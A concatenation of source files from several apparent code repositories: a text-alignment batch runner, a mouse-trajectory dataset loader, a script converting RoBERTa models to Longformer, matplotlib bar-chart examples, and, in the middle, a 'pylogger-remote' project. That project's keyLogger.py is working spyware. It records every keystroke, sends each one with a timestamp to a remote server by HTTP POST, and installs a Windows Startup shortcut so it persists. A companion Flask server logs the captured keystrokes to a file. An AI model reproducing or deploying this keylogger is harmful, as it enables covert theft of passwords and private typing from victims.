if len(compareStringArray) == 0:
return
# if (print_to_file):
# print("開始執行比對:")
t1 = datetime.datetime.now()
    # run the alignment for this task's pairs
alignMessges = run_align_task(compareStringArray, taskobj.config,
taskobj.messageType, taskobj.variantMode,
taskobj.variantFile, print_to_file, batch_mode=True)
t2 = datetime.datetime.now()
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Info]執行完成,花費:{} 秒".format(trid, (t2-t1).seconds))
if logLevel >= 3:
print(logMessages[-1])
if (OUTPUT_filename):
        # make sure the output folder exists
outdir = os.path.dirname(OUTPUT_filename)
Path(outdir).mkdir(parents=True, exist_ok=True)
        if len(alignMessges) > 1: # write the results; the first entry is the header row
if logLevel >= 2:
logMessages.append("[#TID:{0}][#Output][#c:{2}]結果輸出於:{1}, 共{2}筆".format(
trid, OUTPUT_filename, len(alignMessges)-1))
with open(OUTPUT_filename, 'w') as ofile:
ofile.write("\r\n".join(alignMessges))
        else: # no results, skip writing the file
if logLevel >= 2:
logMessages.append(
"[#TID:{}][#Output][#c:0]沒有比對結果,不輸出。".format(trid))
return logMessages
# if ("log_file" in taskobj.config):
# logfile = open(os.path.join(".",taskobj.config["log_file"]),"a")
# logfile.write("\r\n".join(logMessages))
# logfile.write("\r\n")
# logfile.close()
def unissw_dila_main():
FILE_PATH = os.path.dirname(__file__)
task_file = None
config_file = "config.json"
    # key flow-control parameters, set from the command-line arguments
    OUTPUT_filename = None
    variantMode = False # True/False: whether to enable variant-character matching
    variantFile = os.path.join(FILE_PATH, "data", "variants.txt")
    config_file = os.path.join(FILE_PATH, "config.json")
    messageType = 1 # 1: production output, 2: debug output (enable with -d)
    compareStringArray = [] # list of (id1, text1, id2, text2) tuples to compare
try:
opts, args = getopt.getopt(sys.argv[1:], "t:c:")
except getopt.GetoptError as err:
# print help information and exit:
usage()
sys.exit(2)
for opt, value in opts:
if "-c" in opt:
config_file = value
if "-t" in opt:
task_file = value
if not task_file:
print("You have to specify the path of the taskfile.")
usage()
exit()
elif not os.path.isfile(task_file):
print("Error: Task FILE ({}) does not exist.".format(task_file))
exit()
    # load the config file
config = read_config(config_file)
if ("log_file" in config):
print("log將輸出於:{}".format(config["log_file"]))
    # log_message_level = 0: no log messages at all
    # log_message_level = 1: overall task start/done messages only
    # log_message_level = 2: detailed per-task messages written to the log file
    # log_message_level = 3: level 2 plus console printing (default)
if "log_message_level" in config:
logLevel = int(config["log_message_level"])
else:
logLevel = 3
    # load the task.json file
task_json = []
with open(task_file, "r") as tfile:
task_json = json.load(tfile)
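    # The task file is a JSON list of task records; a minimal hypothetical example
    # with a single "s"-type record (file names here are placeholders):
    # [
    #   {
    #     "task_id": "T0001",
    #     "data_type": "s",
    #     "data_folder": "data/T0001",
    #     "pair_file": "pairs.txt",
    #     "sent_file1": "sent_a.txt",
    #     "sent_file2": "sent_b.txt",
    #     "output_file": "out/T0001_result.txt"
    #   }
    # ]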
t0 = datetime.datetime.now()
    # build the work items
    taskObjList = [TaskObj(config, messageType, variantMode,
                           variantFile, t, logLevel) for t in task_json]
    # configure the multiprocessing pool
    if ("num_of_max_process" in config):
        pool = Pool(config["num_of_max_process"])
    else:
        pool = Pool()  # Pool() without an argument defaults to the number of CPU cores
msg = "程式運行開始,全部共有:{} 比對工作待進行。".format(len(taskObjList))
print(msg)
if ("log_file" in config):
logfile = open(os.path.join(".", config["log_file"]), "w")
logfile.write("{}\r\n".format(msg))
logfile.close()
    # run the tasks in parallel, streaming results back as workers finish
task_done = 0
tx = datetime.datetime.now()
for msgs in pool.imap(processTask, taskObjList):
tr = taskObjList[task_done].task
trid = tr["task_id"] if "task_id" in tr else "Unknown"
now = datetime.datetime.now()
task_done += 1
if logLevel >= 1:
msgs.append("[#TID:{}][#TaskDone]已完成:{}/{} [Time:{}(秒)]".format(trid,
task_done, len(taskObjList), (now-tx).seconds))
print(msgs[-1])
if logLevel >= 2:
msgs.append("-"*60)
if logLevel >= 3:
print(msgs[-1])
if ("log_file" in config):
logfile = open(os.path.join(".", config["log_file"]), "a")
logfile.write("\r\n".join(msgs))
logfile.write("\r\n")
logfile.close()
tx = now
# for taskobj in taskObjList:
# processTask(taskobj)
t = datetime.datetime.now()
msg = "執行完成,全部花費:{} 秒".format((t-t0).seconds)
print(msg)
if ("log_file" in config):
logfile = open(os.path.join(".", config["log_file"]), "a")
logfile.write("{}\r\n".format(msg))
logfile.close()
if __name__ == '__main__':
unissw_dila_main()
```
|
{
"source": "jenjsun/calibratable-style-consistency",
"score": 2
}
|
#### File: datasets/mouse_v1/core.py
```python
import os
import numpy as np
import torch
from util.datasets import TrajectoryDataset
from .label_functions import label_functions_list
# TODO let users define where data lies
ROOT_DIR = 'util/datasets/mouse_v1/data'
TRAIN_FILE = 'train.npz'
TEST_FILE = 'test.npz'
FRAME_WIDTH_TOP = 1024
FRAME_HEIGHT_TOP = 570
class MouseV1Dataset(TrajectoryDataset):
name = 'mouse_v1'
all_label_functions = label_functions_list
# Default config
_seq_len = 100
_state_dim = 28
_action_dim = 28
normalize_data = True
single_agent = False
def __init__(self, data_config):
super().__init__(data_config)
def _load_data(self):
# Process configs
if 'normalize_data' in self.config:
self.normalize_data = self.config['normalize_data']
if 'single_agent' in self.config:
self.single_agent = self.config['single_agent']
# TODO hacky solution
if 'labels' in self.config:
for lf_config in self.config['labels']:
lf_config['data_normalized'] = self.normalize_data
self.train_states, self.train_actions = self._load_and_preprocess(train=True)
self.test_states, self.test_actions = self._load_and_preprocess(train=False)
def _load_and_preprocess(self, train):
path = os.path.join(ROOT_DIR, TRAIN_FILE if train else TEST_FILE)
file = np.load(path)
data = file['data']
# Subsample timesteps
data = data[:,::self.subsample]
# Normalize data
if self.normalize_data:
data = normalize(data)
# Convert to states and actions
states = data
actions = states[:,1:] - states[:,:-1]
# Update dimensions
self._seq_len = actions.shape[1]
self._state_dim = states.shape[-1]
self._action_dim = actions.shape[-1]
print(states.shape)
print(actions.shape)
return torch.Tensor(states), torch.Tensor(actions)
def save(self):
pass
def normalize(data):
"""Scale by dimensions of image and mean-shift to center of image."""
state_dim = data.shape[2]//2
shift = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
scale = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
return np.divide(data-shift, scale)
def unnormalize(data):
"""Undo normalize."""
state_dim = data.shape[2]//2
shift = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
scale = [int(FRAME_WIDTH_TOP/2), int(FRAME_HEIGHT_TOP/2)] * state_dim
return np.multiply(data, scale) + shift
def _set_figax():
pass
```
#### File: mouse_v1/label_functions/heuristics.py
```python
import torch
import numpy as np
from util.datasets import LabelFunction
class AverageSpeed(LabelFunction):
name = 'average_speed'
def __init__(self, lf_config):
super().__init__(lf_config, output_dim=1)
def label_func(self, states, actions, true_label=None):
vel = actions.view(actions.size(0), -1, 2)
speed = torch.norm(vel, dim=-1)
avg_speed = torch.mean(speed, dim=0)
return torch.mean(avg_speed)
def plot(self, ax, states, label, width, length):
return ax
class NoseNoseDistance(LabelFunction):
name = 'nose_nose_distance'
def __init__(self, lf_config):
super().__init__(lf_config, output_dim=1)
def label_func(self, states, actions, true_label=None):
keypoints = states.view(states.size(0), 2, 7, 2)
nose_distance = torch.norm(
keypoints[:, 0, 0, :] - keypoints[:, 1, 0, :], dim=-1)
return torch.mean(nose_distance)
def plot(self, ax, states, label, width, length):
return ax
```
|
{
"source": "jenka13all/Master-Thesis-Multilingual-Longformer",
"score": 2
}
|
#### File: Master-Thesis-Multilingual-Longformer/scripts/run_long_lm.py
```python
import argparse
import copy
import datetime
from dataclasses import dataclass, field
import functools
import logging
import math
import os
import pickle
import re
import sys
import time
import threading
from typing import Optional
import torch
from torch.utils.data.dataset import Dataset
from torch.utils.tensorboard import SummaryWriter
import tqdm
from transformers import logging as hf_logging
from transformers.modeling_longformer import LongformerSelfAttention
from transformers import (
PreTrainedModel,
PreTrainedTokenizer,
AutoModelForMaskedLM,
RobertaForMaskedLM,
XLMRobertaForMaskedLM,
AutoTokenizer,
)
from transformers import (
HfArgumentParser,
DataCollatorForLanguageModeling,
Trainer,
TrainingArguments,
set_seed,
)
class color:
"""Help print colors to terminal."""
PURPLE = "\033[95m"
CYAN = "\033[96m"
DARKCYAN = "\033[36m"
BLUE = "\033[94m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
RED = "\033[91m"
BOLD = "\033[1m"
UNDERLINE = "\033[4m"
END = "\033[0m"
def is_roberta_based_model(model_name: str) -> str:
"""Validate if the model to pre-train is of roberta architecture."""
r = re.compile('(.*)roberta(.*)')
matches = r.findall(model_name)
base_name = 'none'
if len(matches) > 0:
base_name = '-'.join(model_name.split('-')[:-1])
return base_name
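# Illustrative behaviour (assumed, based only on the regex and split above):
#   is_roberta_based_model("xlm-roberta-base")  -> "xlm-roberta"
#   is_roberta_based_model("roberta-base")      -> "roberta"
#   is_roberta_based_model("bert-base-uncased") -> "none"
# i.e. everything up to the last '-'-separated token is kept when 'roberta' occurs in the name.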
##########################################
#
# Arguments
#
##########################################
"""Helper function: Define argparser and args."""
parser = argparse.ArgumentParser()
parser.add_argument(
"--model_name",
default=None,
type=str,
help="Name to save the model as.",
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
help="The output directory for the trained model.",
)
parser.add_argument(
"--model_type",
default=None,
type=str,
help="Model type selected in the list from Huggingface ex:"
" `bert, roberta, xlm-roberta, ...`",
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
help="Path to pretrained model from huggingface.co/models. "
"Only tested on `xlm-roberta-base` and `roberta-base`.",
)
parser.add_argument(
"--logging_dir",
default=None,
type=str,
help="Where logs are stored.",
)
parser.add_argument(
"--model_max_length",
default=4096,
type=int,
choices=[
512,
1024,
2048,
4096,
8192,
16384,
32768,
65536,
131072,
262144,
524288,
1048576,
],
help="The maxiumum position of the model",
)
parser.add_argument(
"--attention_window",
default=512,
type=int,
help="Size of attention window",
)
parser.add_argument(
"--evaluation_strategy",
default="no",
type=str,
help="How evaluation should be logged, 'steps', 'epochs', 'no'.",
)
parser.add_argument(
"--do_train",
action="store_true",
help="Whether to run training."
)
parser.add_argument(
"--do_eval",
action="store_true",
help="Whether to run eval on the dev set."
)
parser.add_argument(
"--per_device_train_batch_size",
default=8,
type=int,
help="Batch size per GPU/CPU for training.",
)
parser.add_argument(
"--per_device_eval_batch_size",
default=8,
type=int,
help="Batch size per GPU/CPU for evaluation.",
)
parser.add_argument(
"--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.",
)
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of gradient updates to perform before updating the weights",
)
parser.add_argument(
"--weight_decay",
default=0.0,
type=float,
help="Weight decay if we apply some."
)
parser.add_argument(
"--adam_epsilon",
default=1e-8,
type=float,
help="Epsilon for Adam optimizer."
)
parser.add_argument(
"--max_grad_norm", default=1.0, type=float, help="Max gradient norm."
)
parser.add_argument(
"--num_train_epochs",
default=3.0,
type=float,
help="Total number of training epochs to perform.",
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. "
"Override num_train_epochs.",
)
parser.add_argument(
"--warmup_steps",
default=0,
type=int,
help="Linear warmup over warmup_steps."
)
parser.add_argument(
"--verbose_logging",
action="store_true",
help="If true, log all information when loading datasets.",
)
parser.add_argument(
"--cache_dir",
default=None,
help="Where do you want to store the pretrained models.",
)
parser.add_argument(
"--lang_id",
default=0,
type=int,
help="language id of input for language-specific xlm models "
"(see tokenization_xlm.PRETRAINED_INIT_CONFIGURATION)",
)
parser.add_argument(
"--logging_steps",
type=int,
default=500,
help="Log every X updates steps."
)
parser.add_argument(
"--save_steps",
type=int,
default=500,
help="Save checkpoint every X updates steps.",
)
parser.add_argument(
"--eval_all_checkpoints",
action="store_true",
help="Evaluate all checkpoints starting with the same prefix as model_name"
"ending and ending with step number",
)
parser.add_argument(
"--overwrite_output_dir",
action="store_true",
help="Overwrite the content of the output directory",
)
parser.add_argument(
"--seed",
type=int,
default=42,
help="random seed for initialization"
)
parser.add_argument(
"--local_rank",
type=int,
default=-1,
help="local_rank for distributed training on gpus",
)
parser.add_argument(
"--fp16",
action="store_true",
help="Whether to use 16-bit (mixed) precision (through NVIDIA apex)",
)
parser.add_argument(
"--fp16_opt_level",
type=str,
default="O1",
help="For fp16: Apex AMP optimization level selected in"
"['O0', 'O1', 'O2', and 'O3'].",
)
parser.add_argument(
"--train_file_path",
type=str,
default="/workspace/data/wikitext-103/wiki.train.raw",
help="File path to language model training file",
)
parser.add_argument(
"--val_file_path",
type=str,
default="/workspace/data/wikitext-103/wiki.valid.raw",
help="File path to language model validation file",
)
parser.add_argument(
"--eval_steps",
type=int,
default=None,
help="Number of evaluation steps",
)
parser.add_argument(
"--prediction_loss_only",
action="store_true",
help="Prediction loss only",
)
args = parser.parse_args()
hf_logging.enable_default_handler()
hf_logging.set_verbosity_info()
hf_logging.enable_explicit_format()
tb_writer = SummaryWriter(log_dir=args.logging_dir)
logger = logging.getLogger("")
logger.setLevel(logging.INFO)
fh = logging.FileHandler(f"{args.logging_dir}.log")
sh = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter(
"[%(asctime)s], %(levelname)s %(message)s",
datefmt="%a, %d %b %Y %H:%M:%S",
)
fh.setFormatter(formatter)
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
logger.info("\n --> Starting logger:\n" + "=" * 55 + "\n")
logger.warning(
f"Process rank: {args.local_rank}, \
distributed training: {bool(args.local_rank != -1)}, \
16-bits training: {args.fp16}"
)
##########################################
#
# Replace Huggingface - TextDataset
#
##########################################
# https://github.com/tqdm/tqdm/issues/458
def provide_progress_bar(
function, estimated_time, tstep=0.2, tqdm_kwargs={}, args=[], kwargs={}
):
ret = [None] # Mutable var so the function can store its return value
def myrunner(function, ret, *args, **kwargs):
ret[0] = function(*args, **kwargs)
thread = threading.Thread(
target=myrunner, args=(function, ret) + tuple(args), kwargs=kwargs
)
pbar = tqdm.tqdm(total=estimated_time, **tqdm_kwargs)
thread.start()
while thread.is_alive():
thread.join(timeout=tstep)
pbar.update(tstep)
pbar.close()
return ret[0]
def progress_wrapped(estimated_time, tstep=0.2, tqdm_kwargs={}):
def real_decorator(function):
@functools.wraps(function)
def wrapper(*args, **kwargs):
return provide_progress_bar(
function,
estimated_time=estimated_time,
tstep=tstep,
tqdm_kwargs=tqdm_kwargs,
args=args,
kwargs=kwargs,
)
return wrapper
return real_decorator
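# Usage sketch (illustrative only, not part of the original script): the decorator runs the
# wrapped call in a background thread while a tqdm bar, sized by a rough time estimate in
# seconds, ticks in the foreground, e.g.
#
#   @progress_wrapped(estimated_time=5)
#   def slow_step(text):
#       ...
#
# `slow_step(text)` then returns its usual value while showing a ~5 s progress bar.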
class TextDataset(Dataset):
# Ugly HACK on older transformers
# Use same code as Huggingface TextDataset
def __init__(
self,
tokenizer: PreTrainedTokenizer,
file_path: str,
block_size: int,
overwrite_cache=False,
cache_dir: Optional[str] = None,
):
assert os.path.isfile(
file_path), f"Input file path {file_path} not found"
block_size = block_size - \
tokenizer.num_special_tokens_to_add(pair=False)
directory, filename = os.path.split(file_path)
cached_features_file = os.path.join(
cache_dir if cache_dir is not None else directory,
"cached_lm_{}_{}_{}".format(
tokenizer.__class__.__name__,
str(block_size),
filename,
),
)
# Make sure only the first process in distributed training processes the dataset,
# and the others will use the cache.
@progress_wrapped(estimated_time=200)
def tokenize_text(text):
return tokenizer.tokenize(text)
@progress_wrapped(estimated_time=300)
def convert_tokens_to_ids(tokenized_text):
return tokenizer.convert_tokens_to_ids(tokenized_text)
if os.path.exists(cached_features_file) and not overwrite_cache:
start = time.time()
with open(cached_features_file, "rb") as handle:
self.examples = pickle.load(handle)
logger.info(
f"Loading features from cached file {cached_features_file} [took %.3f s]",
time.time() - start,
)
else:
logger.info(
f"Creating features from dataset file at {directory}\n\n")
self.examples = []
with open(file_path, encoding="utf-8") as f:
text = f.read()
# For large texts and models, this could take a long time
            # Done in two steps, since each part can take between 5-10 min
start = time.time()
text = tokenize_text(text)
logger.info("Tokenizing text [took %.3f s]", time.time() - start)
start = time.time()
tokenized_text = convert_tokens_to_ids(text)
logger.info(
"Converting text to id [took %.3f s]\n", time.time() - start)
start = time.time()
for i in range(
0, len(tokenized_text) - block_size + 1, block_size
): # Truncate in block of block_size
self.examples.append(
tokenizer.build_inputs_with_special_tokens(
tokenized_text[i: i + block_size]
)
)
logger.info(
"Build tokenizer inputs by block_size length [took %.3f s]",
time.time() - start,
)
start = time.time()
with open(cached_features_file, "wb") as handle:
pickle.dump(self.examples, handle,
protocol=pickle.HIGHEST_PROTOCOL)
logger.info(
"Saving features into cached file %s [took %.3f s]",
cached_features_file,
time.time() - start,
)
def __len__(self):
return len(self.examples)
def __getitem__(self, i) -> torch.Tensor:
return torch.tensor(self.examples[i], dtype=torch.long)
###########################################################
#
# Longformer conversion
#
###########################################################
# TODO: Huggingface transformers v. >3.5.1 breaks this
class LongModelSelfAttention(LongformerSelfAttention):
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
encoder_hidden_states=None,
encoder_attention_mask=None,
output_attentions=False,
):
print()
return super().forward(
hidden_states,
attention_mask=attention_mask,
)
# Load initial model
MODEL: PreTrainedModel
if is_roberta_based_model(args.model_name_or_path) == "xlm-roberta":
MODEL = XLMRobertaForMaskedLM
elif is_roberta_based_model(args.model_name_or_path) == "roberta":
MODEL = RobertaForMaskedLM
else:
raise NotImplementedError("Currently only supports roberta-based architectures.")
class LongModelForMaskedLM(MODEL):
def __init__(self, config):
super().__init__(config)
#print(f"\n{color.YELLOW}Converting models to Longformer is currently only tested for RoBERTa like architectures.{color.END}")
for i, layer in enumerate(self.roberta.encoder.layer):
layer.attention.self = LongModelSelfAttention(config, layer_id=i)
def create_long_model(
save_model_to,
model,
tokenizer,
attention_window,
model_max_length
):
config = model.config
position_embeddings = model.roberta.embeddings.position_embeddings
tokenizer.model_max_length = model_max_length
tokenizer.init_kwargs['model_max_length'] = model_max_length
current_model_max_length, embed_size = position_embeddings.weight.shape
# NOTE: RoBERTa has positions 0,1 reserved
# embedding size is max position + 2
model_max_length += 2
config.max_position_embeddings = model_max_length
assert model_max_length > current_model_max_length, \
"New model max_length must be longer than current max_length"
# BUG for XLM: Need to make all zeros since too large base model
new_pos_embed = position_embeddings.weight.new_zeros(
model_max_length, embed_size
)
k = 2
step = current_model_max_length - 2
while k < model_max_length - 1:
new_pos_embed[k:(
k + step)] = position_embeddings.weight[2:]
k += step
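    # Worked illustration (assuming a roberta-base style checkpoint with 514 positions
    # extended to model_max_length 4096+2): step = 512, and the 512 learned embeddings in
    # rows 2..513 of the old table are tiled into rows 2, 514, 1026, ... until the new
    # position table is filled.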
# HACK for Huggingface transformers >=3.4.0 and < 4.0
# https://github.com/huggingface/transformers/issues/6465#issuecomment-719042969
position_embeddings.weight.data = new_pos_embed
model.roberta.embeddings.position_embeddings.num_embeddings = len(
new_pos_embed.data
)
num_model_embeddings = position_embeddings.num_embeddings
model.roberta.embeddings.position_ids = torch.arange(
0, num_model_embeddings
)[None]
# replace the `modeling_bert.BertSelfAttention` object with `LongformerSelfAttention`
config.attention_window = [attention_window] * config.num_hidden_layers
for i, layer in enumerate(model.roberta.encoder.layer):
longformer_self_attn = LongformerSelfAttention(config, layer_id=i)
longformer_self_attn.query = layer.attention.self.query
longformer_self_attn.key = layer.attention.self.key
longformer_self_attn.value = layer.attention.self.value
#allenai
longformer_self_attn.query_global = copy.deepcopy(layer.attention.self.query)
longformer_self_attn.key_global = copy.deepcopy(layer.attention.self.key)
longformer_self_attn.value_global = copy.deepcopy(layer.attention.self.value)
#longformer_self_attn.query_global = layer.attention.self.query
#longformer_self_attn.key_global = layer.attention.self.key
#longformer_self_attn.value_global = layer.attention.self.value
layer.attention.self = longformer_self_attn
logger.info(f'saving model to {save_model_to}')
model.save_pretrained(save_model_to)
tokenizer.save_pretrained(save_model_to)
return model, tokenizer
#allenai
def copy_proj_layers(model):
for i, layer in enumerate(model.roberta.encoder.layer):
layer.attention.self.query_global = copy.deepcopy(layer.attention.self.query)
layer.attention.self.key_global = copy.deepcopy(layer.attention.self.key)
layer.attention.self.value_global = copy.deepcopy(layer.attention.self.value)
return model
#def copy_proj_layers(model):
# for _, layer in enumerate(model.roberta.encoder.layer):
# layer.attention.self.query_global = layer.attention.self.query
# layer.attention.self.key_global = layer.attention.self.key
# layer.attention.self.value_global = layer.attention.self.value
# return model
def pretrain_and_evaluate(
training_args, data_args, model, tokenizer, eval_only, model_path
):
val_dataset = TextDataset(
tokenizer=tokenizer,
file_path=data_args.val_file_path,
block_size=tokenizer.max_len,
)
if eval_only:
train_dataset = val_dataset
else:
logger.info(
f"Loading and tokenizing training data is usually slow: {data_args.train_file_path}"
)
train_dataset = TextDataset(
tokenizer=tokenizer,
file_path=data_args.train_file_path,
block_size=tokenizer.max_len,
)
data_collator = DataCollatorForLanguageModeling(
tokenizer=tokenizer, mlm=True, mlm_probability=0.15
)
trainer = Trainer(
model=model,
args=training_args,
data_collator=data_collator,
train_dataset=train_dataset,
eval_dataset=val_dataset,
        # deprecated as a keyword argument: move into args.prediction_loss_only
#prediction_loss_only=True,
)
eval_loss = trainer.evaluate()
eval_loss = eval_loss["eval_loss"]
print(f"Initial eval bpc: {color.GREEN}{eval_loss/math.log(2)}{color.END}")
logger.info(f"Initial eval bpc: {eval_loss/math.log(2)}")
if not eval_only:
trainer.train(model_path=model_path)
trainer.save_model()
eval_loss = trainer.evaluate()
eval_loss = eval_loss["eval_loss"]
print(
f"Eval bpc after pretraining: \
{color.GREEN}{eval_loss/math.log(2)}{color.END}"
)
logger.info(f"Eval bpc after pretraining: {eval_loss/math.log(2)}")
@dataclass
class ModelArguments:
"""Huggingface parameters for the model training."""
model_name_or_path: str = field(
default=None,
metadata={
"help": "Name of pretrained model to load for model and tokenizer"
", based on huggingface.co/models, ex 'roberta-base'"
},
)
model_name: str = field(
default="roberta-base-long-4096-lm",
metadata={"help": "Name to use when saving model."},
)
attention_window: int = field(
default=512,
metadata={"help": "Size of attention window"}
)
model_max_length: int = field(
default=4096,
metadata={"help": "Maximum position"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={
"help": "Where do you want to store the pretrained models."
},
)
@dataclass
class DataTrainingArguments:
"""Training and validation data arguments."""
val_file_path: str = field(
default="/workspace/data/wikitext-103-raw/wiki.valid.raw",
metadata={"help": "File for training a Language Model"},
)
train_file_path: str = field(
default="/workspace/data/wikitext-103-raw/wiki.train.raw",
metadata={"help": "File for evaluating a Language Model"},
)
def main():
############################################
#
# Define model params
#
############################################
parser = HfArgumentParser(
(ModelArguments, DataTrainingArguments, TrainingArguments)
)
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
print('training_args: ')
print(training_args)
print('training_args n_gpu, device:')
print(training_args.n_gpu)
print(training_args.device)
set_seed(training_args.seed)
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) \
already exists and is not empty.\
Use --overwrite_output_dir to overcome."
)
###########################################
#
# RUN
#
###########################################
start = time.time()
print("---------------------------------------------------------")
print(
f"\nLoading from Huggingface pretrained model: \
`{color.BOLD}{color.GREEN}\
{model_args.model_name_or_path}\
{color.END}{color.END}` \
with name: {model_args.model_name}\n"
)
model = AutoModelForMaskedLM.from_pretrained(
model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.model_name_or_path,
model_max_length=model_args.model_max_length,
cache_dir=model_args.cache_dir,
use_fast=True,
)
print(f"{color.RED}Creating Longformer model{color.END}")
model_path = training_args.output_dir
if not os.path.exists(model_path):
os.makedirs(model_path)
logger.info(
f"Converting {model_args.model_name_or_path} \
into {model_args.model_name}"
)
model, tokenizer = create_long_model(
save_model_to=model_path,
model=model,
tokenizer=tokenizer,
attention_window=model_args.attention_window,
model_max_length=model_args.model_max_length,
)
print(f"{color.RED}Loading Model{color.END}")
logger.info(f"Loading the model from {model_path}")
model = LongModelForMaskedLM.from_pretrained(model_path)
tokenizer = AutoTokenizer.from_pretrained(
model_path,
model_max_length=model_args.model_max_length,
use_fast=True
)
print(f"{color.RED}Evaluate{color.END}")
logger.info(
f"Pretraining \
{model_args.model_name_or_path}-{model_args.model_max_length}... "
)
pretrain_and_evaluate(
training_args,
data_args,
model,
tokenizer,
eval_only=False,
model_path=training_args.output_dir,
)
print(
f"{color.PURPLE}TIME elapsed{color.END}: {datetime.datetime.fromtimestamp(time.time()-start).strftime('%d days, %H:%M:%S')}"
)
logger.info(
"Copying local projection layers into global projection layers..."
)
model = copy_proj_layers(model)
logger.info(f"Saving model to {model_path}")
model.save_pretrained(model_path)
print(f"{color.RED}Loading Done model{color.END}")
logger.info(f"Loading the model from {model_path}")
model = LongModelForMaskedLM.from_pretrained(model_path)
tokenizer = AutoTokenizer.from_pretrained(model_path)
if __name__ == "__main__":
main()
```
|
{
"source": "jenkatuwal/pylogger-remote",
"score": 3
}
|
#### File: jenkatuwal/pylogger-remote/keyLogger.py
```python
import os
import pathlib
import winshell
import win32com.client
from datetime import datetime
import pynput
import requests
def init():
new_kl = KeyListener()
new_kl.first_run()
new_kl.run()
class KeyListener:
def __init__(self):
self.serverName = ""
self.serverPort = ""
self.program_name = ""
def on_press(self, key):
current_time_formatted = datetime.now().strftime("%Y-%m-%d : %H:%M:%S")
prepared_key = "[%s]: %s pressed" % (current_time_formatted, key)
prepared_obj = {"Body": prepared_key}
requests.post("%s:%s" % (self.serverName, self.serverPort), data=prepared_obj)
def first_run(self):
shortcut_name = self.program_name + ".lnk"
file_list = os.listdir(winshell.startup())
if shortcut_name in file_list:
return False
else:
# Get current dir, and append it to target file path
current_dir_path = pathlib.Path(pathlib.Path().resolve())
target_file_path = os.path.join(current_dir_path, "%s.exe" % self.program_name)
# Get startup file path, and add .lnk file to it
startup = pathlib.Path(winshell.startup())
path = os.path.join(startup, '%s.lnk' % self.program_name)
# Get shell to create a shortcut to the desired path
shell = win32com.client.Dispatch("WScript.Shell")
shortcut = shell.CreateShortCut(path)
# Add path and icon to the location
shortcut.Targetpath = target_file_path
shortcut.IconLocation = target_file_path
shortcut.save()
def run(self):
with pynput.keyboard.Listener(on_press=self.on_press) as listener:
listener.join()
if __name__ == '__main__':
init()
```
#### File: jenkatuwal/pylogger-remote/keyServer.py
```python
from flask import Flask
from flask import request
keyServer = Flask(__name__)
def file_write(prepstr):
f = open("kl.txt", "a")
f.write(prepstr + "\n")
@keyServer.route("/", methods=["POST"])
def keyAction():
body = request.values.get("Body")
print(body)
file_write(body)
return "Received"
if __name__ == '__main__':
# Change the port to a port that has been port forwarded (i.e. 25564)
keyServer.run(host="0.0.0.0", port=00000, debug=True)
```
|
{
"source": "jenkayco/hacknostics",
"score": 4
}
|
#### File: Examples/scripts/bar_1.py
```python
import xarray as xr
import numpy as np
import matplotlib.pyplot as plt
#************************************************
def yyyymm_to_yyyyfrac(d, offset=0.5):
# todo: check the math on this.
out = []
for i in d.values:
tmp = str(int(i))
y = int(tmp[0:4])
m = int(tmp[-2:])
f = ((m+offset)-1)/12
out.append(y+f)
return np.array(out)
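# Worked example (illustrative): with the default offset of 0.5, the integer date 200006
# becomes 2000 + ((6 + 0.5) - 1) / 12 = 2000.458..., i.e. mid-June 2000 as a year fraction.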
f = xr.open_dataset("/Users/brianpm/Downloads/SOI_Darwin.nc")
# note: I could not locate soi.nc as in NCL examples
date = f['date'] # YYYYMM
dsoid = f['DSOI']
dateF = yyyymm_to_yyyyfrac(date) # <- this is an NCL specialty; replicated above
dimDate = date.shape # number of dates
print(f"The shape of date is {date.shape}")
# the original was decadal, average
# usually you can use xarray to do this using time coords, but
# this dataset has just ints for time, so we can just reshape it and average with np
yearly = np.mean(dsoid.values.reshape(dimDate[0]//12, 12), axis=1)
# convert integer YYYYMM to float
tmp = dateF.reshape(dimDate[0]//12, 12)
dateyearly = np.mean(tmp, axis=1)
print(dateyearly)
#
# create plot
#
# 1. try to do it like NCL,
# EXCEPT, have the bars originate from zero because that makes sense.
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(dateyearly, yearly, color=None, edgecolor='black', fill=False)
fig.savefig("bar_1.png")
# 2. outline only
fig, ax = plt.subplots(figsize=(10,5))
ax.step(dateyearly, yearly, color='black')
fig.savefig("bar_2.png")
# Note: I don't know how to make the bars originate from some other value,
# like they do by default in NCL. Nor do I know of why you would ever want
# such behavior. You can set the bottom keyword argument, but that appears
# to adjust the whole data set.
# Instead, I show a very simple change to the orientation of the bars.
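# A possible workaround (sketch, not taken from the NCL example; the filename below is
# arbitrary): plot the difference from a reference value and pass that value as `bottom`,
# so the bars visually originate from the reference instead of zero.
base = yearly.mean()
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(dateyearly, yearly - base, bottom=base, edgecolor='black', fill=False)
fig.savefig("bar_2b_baseline_sketch.png")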
# 3. Change orientation
fig, ax = plt.subplots(figsize=(10,5))
ax.barh(dateyearly, yearly, color='red', edgecolor='black')
fig.savefig("bar_3.png")
# 4. Color based on value
fig, ax = plt.subplots(figsize=(10,5))
ax.barh(dateyearly[yearly < 0], yearly[yearly < 0], color='lightblue', edgecolor='')
ax.barh(dateyearly[yearly > 0], yearly[yearly > 0], color='pink', edgecolor='')
fig.savefig("bar_4.png")
# 5. change width of bars
fig, ax = plt.subplots(figsize=(10,5))
barwidth = 0.33
ax.barh(dateyearly[yearly < 0], yearly[yearly < 0], height=barwidth, color='lightblue', edgecolor='')
